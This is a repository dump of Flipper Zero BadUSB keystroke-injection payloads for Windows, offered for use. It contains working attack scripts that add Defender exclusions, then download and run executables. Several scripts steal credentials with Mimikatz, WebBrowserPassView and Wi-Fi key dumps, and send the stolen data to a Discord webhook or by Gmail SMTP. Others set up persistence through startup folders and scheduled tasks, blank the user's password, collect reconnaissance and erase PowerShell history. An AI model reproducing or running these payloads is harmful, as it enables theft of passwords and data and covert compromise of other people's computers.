     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Rickroll video ends up in BSOD
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 400
     6 +GUI r
     7 +DELAY 500
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +CTRL-SHIFT ENTER
     10 +DELAY 850
     11 +SHIFT TAB
     12 +DELAY 500
     13 +ENTER
     14 +DELAY 1000
     15 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     16 +ENTER
     17 +DELAY 500
     18 +STRING $down=New-Object System.Net.WebClient;$url='https://github.com/AGO061/rickroll-bsod/releases/download/first-version/rick_dist.exe';$file='rick_dist.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
     19 +ENTER
     20 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/FUN/Rickroll.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Rickroll what else
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 1200
     6 +GUI r
     7 +DELAY 200
     8 +STRING cmd
     9 +ENTER
     10 +DELAY 200
     11 +STRING mkdir "%USERPROFILE%\Music\tmp"
     12 +ENTER
     13 +STRING cd %tmp% && copy con dlrick.vbs
     14 +ENTER
     15 +ENTER
     16 +STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
     17 +ENTER
     18 +STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
     19 +ENTER
     20 +ENTER
     21 +STRING Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
     22 +ENTER
     23 +STRING Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
     24 +ENTER
     25 +STRING xHttp.Open "GET", "https://qoret.com/dl/uploads/2019/07/Rick_Astley_-_Never_Gonna_Give_You_Up_Qoret.com.mp3", False
     26 +ENTER
     27 +STRING xHttp.Send
     28 +ENTER
     29 +STRING With bStrm
     30 +ENTER
     31 +STRING .type = 1
     32 +ENTER
     33 +STRING .open
     34 +ENTER
     35 +STRING .write xHttp.responseBody
     36 +ENTER
     37 +STRING .saveToFile PRFL + "\Music\tmp\rick.mp3", 2
     38 +ENTER
     39 +STRING End With
     40 +ENTER
     41 +DELAY 100
     42 +CTRL Z
     43 +ENTER
     44 +STRING copy con dlnir.vbs
     45 +ENTER
     46 +ENTER
     47 +STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
     48 +ENTER
     49 +STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
     50 +ENTER
     51 +ENTER
     52 +STRING Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
     53 +ENTER
     54 +STRING Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
     55 +ENTER
     56 +STRING xHttp.Open "GET", "http://www.nirsoft.net/utils/nircmd-x64.zip", False
     57 +ENTER
     58 +STRING xHttp.Send
     59 +ENTER
     60 +STRING With bStrm
     61 +ENTER
     62 +STRING .type = 1
     63 +ENTER
     64 +STRING .open
     65 +ENTER
     66 +STRING .write xHttp.responseBody
     67 +ENTER
     68 +STRING .saveToFile PRFL + "\Music\tmp\nircmd-x64.zip", 2
     69 +ENTER
     70 +STRING End With
     71 +ENTER
     72 +DELAY 100
     73 +CTRL Z
     74 +ENTER
     75 +STRING wscript dlnir.vbs && wscript dlrick.vbs
     76 +ENTER
     77 +DELAY 7000
     78 +STRING powershell.exe -nologo -noprofile -command "& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('%USERPROFILE%\Music\tmp\nircmd-x64.zip', '%USERPROFILE%\Music\tmp'); }"
     79 +ENTER
     80 +DELAY 750
     81 +STRING copy con volup.bat
     82 +ENTER
     83 +STRING :loop
     84 +ENTER
     85 +STRING %USERPROFILE%\Music\tmp\nircmd.exe mutesysvolume 0
     86 +ENTER
     87 +STRING %USERPROFILE%\Music\tmp\nircmd.exe setsysvolume 65535
     88 +ENTER
     89 +STRING timeout /t 5
     90 +ENTER
     91 +STRING goto loop
     92 +ENTER
     93 +DELAY 100
     94 +CTRL z
     95 +ENTER
     96 +STRING move volup.bat %USERPROFILE%\Music\tmp\volup.bat
     97 +ENTER
     98 +STRING copy con hidefiles.vbs
     99 +ENTER
     100 +STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
     101 +ENTER
     102 +STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
     103 +ENTER
     104 +STRING Dim oFSo: Set oFSo = CreateObject("Scripting.FileSystemObject")
     105 +ENTER
     106 +STRING Dim tmpDir: Set tmpDir = oFSo.GetFolder(PRFL + "\Music\tmp")
     107 +ENTER
     108 +STRING tmpDir.attributes = tmpDir.attributes + 2
     109 +ENTER
     110 +DELAY 100
     111 +CTRL z
     112 +ENTER
     113 +STRING wscript hidefiles.vbs
     114 +ENTER
     115 +STRING copy con rickyou.vbs
     116 +ENTER
     117 +STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
     118 +ENTER
     119 +STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
     120 +ENTER
     121 +STRING While true
     122 +ENTER
     123 +STRING Dim oPlayer: Set oPlayer = CreateObject("WMPlayer.OCX")
     124 +ENTER
     125 +STRING oPlayer.URL = PRFL + "\Music\tmp\rick.mp3"
     126 +ENTER
     127 +STRING oPlayer.controls.play
     128 +ENTER
     129 +STRING While oPlayer.playState <> 1 ' 1 = Stopped
     130 +ENTER
     131 +STRING WScript.Sleep 100
     132 +ENTER
     133 +STRING Wend
     134 +ENTER
     135 +STRING oPlayer.close
     136 +ENTER
     137 +STRING Wend
     138 +ENTER
     139 +DELAY 100
     140 +CTRL z
     141 +ENTER
     142 +STRING copy con volup.vbs
     143 +ENTER
     144 +STRING CreateObject("WScript.Shell").Run "%USERPROFILE%\Music\tmp\volup.bat", 0, False
     145 +ENTER
     146 +DELAY 100
     147 +CTRL z
     148 +ENTER
     149 +STRING copy rickyou.vbs "%USERPROFILE%\Music\tmp\rickyou.vbs"
     150 +ENTER
     151 +STRING move rickyou.vbs "%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rickyou.vbs"
     152 +ENTER
     153 +STRING copy volup.vbs "%USERPROFILE%\Music\tmp\volup.vbs"
     154 +ENTER
     155 +STRING move volup.vbs "%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\volup.vbs"
     156 +ENTER
     157 +STRING del dlrick.vbs
     158 +ENTER
     159 +STRING del dlnir.vbs
     160 +ENTER
     161 +STRING del hidefiles.vbs
     162 +ENTER
     163 +STRING del %USERPROFILE%\Music\tmp\NirCmd.chm
     164 +ENTER
     165 +STRING del %USERPROFILE%\Music\tmp\nircmdc.exe
     166 +ENTER
     167 +STRING del %USERPROFILE%\Music\tmp\nircmd-x64.zip
     168 +ENTER
     169 +STRING exit
     170 +ENTER
     171 +DELAY 250
     172 +GUI r
     173 +DELAY 250
     174 +STRING taskschd.msc
     175 +ENTER
     176 +DELAY 2000
     177 +ALT a
     178 +STRING b
     179 +DELAY 1000
     180 +STRING rr
     181 +ENTER
     182 +UP
     183 +ENTER
     184 +STRING s
     185 +TAB
     186 +TAB
     187 +STRING 4801
     188 +ENTER
     189 +ENTER
     190 +STRING wscript
     191 +TAB
     192 +TAB
     193 +STRING %USERPROFILE%\Music\tmp\rickyou.vbs
     194 +ENTER
     195 +ENTER
     196 +DELAY 500
     197 +ALT a
     198 +STRING b
     199 +DELAY 1000
     200 +STRING vu
     201 +ENTER
     202 +UP
     203 +ENTER
     204 +STRING s
     205 +TAB
     206 +TAB
     207 +STRING 4801
     208 +ENTER
     209 +ENTER
     210 +STRING wscript
     211 +TAB
     212 +TAB
     213 +STRING %USERPROFILE%\Music\tmp\volup.vbs
     214 +ENTER
     215 +ENTER
     216 +DELAY 500
     217 +ALT f
     218 +STRING x
     219 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Information-Gathering/General_PC_Information.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Saves some general Information about the target pc to a file.
     3 +REM Version: 1.0
     4 +REM Category: Info
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 900
     8 +WINDOWS r
     9 +DELAY 900
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss'); $userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime; $fileSaveDir = New-Item ($userDir) -ItemType Directory; $date = get-date; $style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>'; $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-34231960.html'; $Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"; $SysBootTime = Get-WmiObject Win32_OperatingSystem; $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime; $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME); $SerialNo = $SysSerialNo.SerialNumber; $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model; $SysManufacturer = $SysInfo.Manufacturer; $SysModel = $SysInfo.Model; $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption; $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"; $HD = [math]::truncate($disk.Size / 1GB); $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB); $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize; $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB); $SysCpu = Get-WmiObject Win32_Processor | Select Name; $Cpu = $SysCpu.Name; $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber; $HardSerialNo = $HardSerial.SerialNumber; $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name; $graphicsCard = gwmi win32_VideoController |select Name; $graphics = $graphicsCard.Name; $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1; $DriveLetter = $CDDrive.Drive; $DriveName = $CDDrive.Caption; $Disk = $DriveLetter + '\' + $DriveName; $Firewall = New-Object -com HNetCfg.FwMgr; $FireProfile = $Firewall.LocalPolicy.CurrentProfile; $FireProfile = $FireProfile.FirewallEnabled; $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"; $Report >> $fileSaveDir'/ComputerInfo-34231960.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\Gather_Informationresults-34231960.zip ; exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Information-Gathering/SaveIP_ToDiscordWebhook.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Saves some general Information about the target pc to a file.
     3 +REM Version: 1.0
     4 +REM Category: Info
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 200
     8 +STRING powershell
     9 +ENTER
     10 +DELAY 1000
     11 +STRING $url="DISCORD WEBHOOK LINK";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "[email protected]" $url ; Remove-Item '.\stats.txt';exit
     12 +ENTER
     13 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Information-Gathering/USB_And_Harddrive_Information.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file.
     3 +REM Version: 1.0
     4 +REM Category: Info
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 900
     8 +WINDOWS r
     9 +DELAY 900
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +GUI UP
     19 +DELAY 900
     20 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>';$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-68597243.html';$Report = $Report + '<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>';$u = 0;$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace);$Report = $Report + '<div id=right><h3>USB Devices</h3><table>'
     21 +ENTER
     22 +STRING do {
     23 +ENTER
     24 +STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)
     25 +ENTER
     26 +STRING $Report = $Report + '<tr><td>Drive Name: </td><td>' + $allUsb[$u].Name + $allUsb[$u].Label + '</td><td>Free Space: </td><td>' + $gbUSB + 'GB</td></tr>'
     27 +ENTER
     28 +STRING Write-Output $fullUSB
     29 +ENTER
     30 +STRING $u ++
     31 +ENTER
     32 +STRING } while ($u -lt $allUsb.Count)
     33 +ENTER
     34 +STRING $Report = $Report + '</table></div>'
     35 +ENTER
     36 +STRING $Report >> $fileSaveDir'/ComputerInfo-68597243.html'
     37 +ENTER
     38 +STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip ; exit
     39 +ENTER
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Information-Gathering/WIN_USER_INFO.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Saves some general Info about the current Win-User.
     3 +REM Version: 1.0
     4 +REM Category: Info
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 900
     8 +WINDOWS r
     9 +DELAY 900
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-57059022.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired;$UserType = $UserInfo.AccountType;$UserSid = $UserInfo.SID;$UserPass = $UserInfo.PasswordRequired;$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator');$Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>";$Report = $Report + "</div>";$Report >> $fileSaveDir'/ComputerInfo-57059022.html'
     19 +ENTER
     20 +STRING Compress-Archive -Path $fileSaveDir -DestinationPath C:\PATH TO SAVE HERE\FILEresults-57059022.zip ; exit
     21 +ENTER
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/MISC/Fck_Windows_Watermark/RemoveWinWatermark.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Removes Windows Watermark but doesn't activate Windows.
     3 +REM Version: 1.0
     4 +REM Category: MISC
     5 +DELAY 1200
     6 +GUI r
     7 +DELAY 100
     8 +STRING powershell Start-Process powershell -verb runAs
     9 +DELAY 600
     10 +ALT Y
     11 +DELAY 600
     12 +STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
     13 +ENTER
     14 +DELAY 100
     15 +STRING Restart-Computer -Force
     16 +ENTER
     17 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/MISC/Fck_Windows_Watermark/placeholder
     1 + 
     2 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/PasswordStealing/BadUSB_windowsPassDisabler.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Disables the Windows Password
     3 +REM Version: 1.0
     4 +REM Category: PasswordStuff
     5 +DELAY 1500
     6 +GUI d
     7 +DELAY 500
     8 +GUI r
     9 +DELAY 500
     10 +STRING powershell.exe -windowstyle hidden
     11 +DELAY 200
     12 +CTRL SHIFT ENTER
     13 +DELAY 2000
     14 +LEFT
     15 +DELAY 150
     16 +ENTER
     17 +DELAY 2000
     18 +STRING net user $env:USERNAME *
     19 +ENTER
     20 +DELAY 150
     21 +ENTER
     22 +DELAY 150
     23 +ENTER
     24 +DELAY 200
     25 +STRING exit
     26 +ENTER
     27 +CAPSLOCK
     28 +DELAY 150
     29 +CAPSLOCK
     30 +DELAY 150
     31 +CAPSLOCK
     32 +DELAY 150
     33 +CAPSLOCK
     34 +DELAY 2000
     35 +CAPSLOCK
     36 +DELAY 150
     37 +CAPSLOCK
     38 +DELAY 150
     39 +CAPSLOCK
     40 +DELAY 150
     41 +CAPSLOCK
     42 +
     43 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/PasswordStealing/Show_Saved_Passwords.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Shows all saved passwords.
     3 +REM Version: 1.0
     4 +REM Category: PasswordStuff
     5 +DELAY 900
     6 +GUI r
     7 +DELAY 1000
     8 +STRING powershell
     9 +ENTER
     10 +DELAY 1000
     11 +STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
     12 +ENTER
     13 +DELAY 5000
     14 +STRING wbpv28821@
     15 +ENTER
     16 +STRING .\WebBrowserPassView.exe
     17 +ENTER
     18 +DELAY 3000
     19 +CTRL A
     20 +CTRL S
     21 +DELAY 1000
     22 +STRING export.html
     23 +TAB
     24 +STRING h
     25 +ENTER
     26 +DELAY 1000
     27 +ALT F4
     28 +DELAY 1000
     29 +STRING Start-Process msedge.exe 'file:///C:/temp/export.htm --inprivate'
     30 +ENTER
     31 +DELAY 2000
     32 +ALT TAB
     33 +DELAY 1000
     34 +STRING cd \
     35 +ENTER
     36 +STRING rmdir -R \temp
     37 +ENTER
     38 +STRING EXIT
     39 +ENTER
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/PasswordStealing/Simple_User_Password_Grabber.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Grabs the current Windows User password.
     3 +REM Version: 1.0
     4 +REM Category: PasswordStuff
     5 +DEFAULT_DELAY 450
     6 +DELAY 1500
     7 +GUI r
     8 +STRING powershell
     9 +CTRL-SHIFT ENTER
     10 +DELAY 600
     11 +ALT y
     12 +STRING Set-MpPreference -ExclusionPath C:\Users
     13 +ENTER
     14 +STRING exit
     15 +ENTER
     16 +GUI r
     17 +STRING cmd
     18 +CTRL-SHIFT ENTER
     19 +DELAY 600
     20 +ALT y
     21 +STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
     22 +ENTER
     23 +DELAY 4000
     24 +STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
     25 +ENTER
     26 +STRING privilege::debug
     27 +ENTER
     28 +STRING sekurlsa::logonPasswords full
     29 +ENTER
     30 +STRING exit
     31 +ENTER
     32 +STRING del %TEMP%\pw.exe
     33 +ENTER
     34 +STRING exit
     35 +ENTER
     36 +GUI r
     37 +STRING powershell
     38 +CTRL-SHIFT ENTER
     39 +DELAY 600
     40 +ALT y
     41 +STRING Remove-MpPreference -ExclusionPath C:\Users
     42 +ENTER
     43 +STRING $SMTPServer = 'smtp.gmail.com'
     44 +ENTER
     45 +STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
     46 +ENTER
     47 +STRING $SMTPInfo.EnableSsl = $true
     48 +ENTER
     49 +STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
     50 +SHIFT 2
     51 +STRING gmail.com', 'PASSWORDHERE');
     52 +ENTER
     53 +STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
     54 +ENTER
     55 +STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
     56 +SHIFT 2
     57 +STRING gmail.com'
     58 +ENTER
     59 +STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
     60 +SHIFT 2
     61 +STRING gmail.com')
     62 +ENTER
     63 +STRING $ReportEmail.Subject = 'Hello from the ducky'
     64 +ENTER
     65 +STRING $ReportEmail.Body = 'Attached is your duck report.'
     66 +ENTER
     67 +STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
     68 +ENTER
     69 +STRING $SMTPInfo.Send($ReportEmail)
     70 +ENTER
     71 +DELAY 4000
     72 +STRING exit
     73 +ENTER
     74 +GUI r
     75 +STRING powershell
     76 +CTRL-SHIFT ENTER
     77 +DELAY 600
     78 +ALT y
     79 +STRING del c:\pwlog.txt
     80 +ENTER
     81 +STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
     82 +ENTER
     83 +STRING exit
     84 +ENTER
     85 +GUI l
     86 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/PasswordStealing/StealWifiKeys.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Steals all of the saved Wifi Passwords and stores them into a file.
     3 +REM Version: 1.0
     4 +REM Category: PasswordStuff
     5 +DELAY 500
     6 +WINDOWS d
     7 +DELAY 500
     8 +WINDOWS r
     9 +DELAY 500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 800
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 800
     16 +ALT y
     17 +DELAY 500
     18 +GUI UP
     19 +DELAY 600
     20 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath C:PUT PATH HERE\ResultsPassword.zip ; exit
     21 +ENTER
Please wait...
Page is in error, reload to recover